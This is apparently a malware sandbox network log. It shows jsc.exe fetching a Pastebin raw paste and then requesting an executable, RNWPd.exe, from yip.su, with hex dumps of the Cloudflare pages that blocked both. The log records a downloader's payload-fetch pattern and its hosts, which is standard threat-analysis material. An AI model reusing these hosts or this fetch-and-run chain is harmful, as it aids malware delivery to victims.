                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:05 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:05 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:05 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:05 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:05 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 32 39 34 32 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 37 39 32 66 32 34 63 33 33 37 27 2c 63 48 61 73 68 3a 20 27 36 31 38 39 33 37 39 62 62 30 31 39 38 61 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 65 52 53 71 30 48 45 36 77 30 4a 61 43 32 6f 61 6c 31 49 48 54 4c 31 56 78 6c 30 39 79 71 42 34 74 45 38 42 64 52 6d 51 44 58 51 2d 31 37 32 33 39 33 32 36 36 35 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '12942',cRay: '8b4cff792f24c337',cHash: '6189379bb0198a4',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=eRSq0HE6w0JaC2oal1IHTL1Vxl09yqB4tE8BdRmQDXQ-1723932665-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:05 UTC1369INData Raw: 48 41 41 61 75 67 56 6b 38 49 7a 6b 66 78 79 61 52 6b 5f 6a 4a 64 34 39 5a 76 4d 6f 31 6f 78 54 39 38 41 55 56 73 50 59 32 30 45 65 6f 52 64 75 72 78 65 78 50 75 46 56 68 4b 78 39 5f 37 6c 52 6a 53 46 64 57 56 69 69 45 6f 73 73 4c 4a 79 41 38 77 75 64 4e 66 4d 6c 35 59 6d 70 77 63 39 5f 67 42 32 69 5a 66 53 34 67 39 4a 4c 72 68 68 70 31 6e 4a 75 37 51 4d 54 77 30 79 6e 55 62 74 69 6f 58 31 42 6c 5a 43 64 39 72 74 67 59 2e 43 6b 55 62 77 4f 56 39 38 57 6c 79 74 32 62 79 78 65 6b 53 47 39 6d 6c 4a 69 42 4e 4b 6b 4f 64 61 73 78 4e 49 6b 49 61 51 70 50 5a 33 71 76 6b 4c 6b 70 5a 69 5a 63 35 31 61 44 54 73 48 33 76 48 39 49 6a 65 74 69 4a 6d 55 55 59 46 42 66 2e 77 30 78 36 67 41 4a 66 53 4e 67 5f 47 46 37 59 39 64 49 76 62 48 42 6f 5f 48 71 68 4f 35 43 5a 38
                                    Data Ascii: HAAaugVk8IzkfxyaRk_jJd49ZvMo1oxT98AUVsPY20EeoRdurxexPuFVhKx9_7lRjSFdWViiEossLJyA8wudNfMl5Ympwc9_gB2iZfS4g9JLrhhp1nJu7QMTw0ynUbtioX1BlZCd9rtgY.CkUbwOV98Wlyt2byxekSG9mlJiBNKkOdasxNIkIaQpPZ3qvkLkpZiZc51aDTsH3vH9IjetiJmUUYFBf.w0x6gAJfSNg_GF7Y9dIvbHBo_HqhO5CZ8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    63192.168.2.549790104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:10 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:10 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cff9929bac3fd-EWR
                                    2024-08-17 22:11:10 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:10 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:10 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:10 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    64192.168.2.549791188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:11 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:11 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:11 UTC683INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 43 35 4d 78 45 50 52 4e 44 75 56 47 43 49 77 49 50 57 56 45 37 70 57 6e 73 4a 65 64 6b 42 30 35 7a 4a 33 5a 4b 6a 4a 70 75 68 2b 47 6e 2b 62 36 6e 74 31 4a 30 37 7a 6d 4d 48 38 74 6b 74 76 4c 32 6c 61 55 5a 44 63 72 64 70 65 71 57 62 79 46 77 34 4d 33 4c 34 6d 61 62 76 45 66 6f 77 67 47 7a 35 78 4c 2f 62 47 69 64 4e 55 3d 24 39 77 5a 6c 53 73 4c 2b 62 77 54 63 72 6b 66 5a 55 2b 63 6d 76 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: C5MxEPRNDuVGCIwIPWVE7pWnsJedkB05zJ3ZKjJpuh+Gn+b6nt1J07zmMH8tktvL2laUZDcrdpeqWbyFw4M3L4mabvEfowgGz5xL/bGidNU=$9wZlSsL+bwTcrkfZU+cmvA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:11 UTC770INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:11 UTC1369INData Raw: 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d
                                    Data Ascii: .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcm
                                    2024-08-17 22:11:11 UTC1369INData Raw: 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72
                                    Data Ascii: o-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color
                                    2024-08-17 22:11:11 UTC1369INData Raw: 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72
                                    Data Ascii: k4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{border
                                    2024-08-17 22:11:11 UTC1369INData Raw: 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31
                                    Data Ascii: ODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color .1
                                    2024-08-17 22:11:11 UTC1369INData Raw: 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b
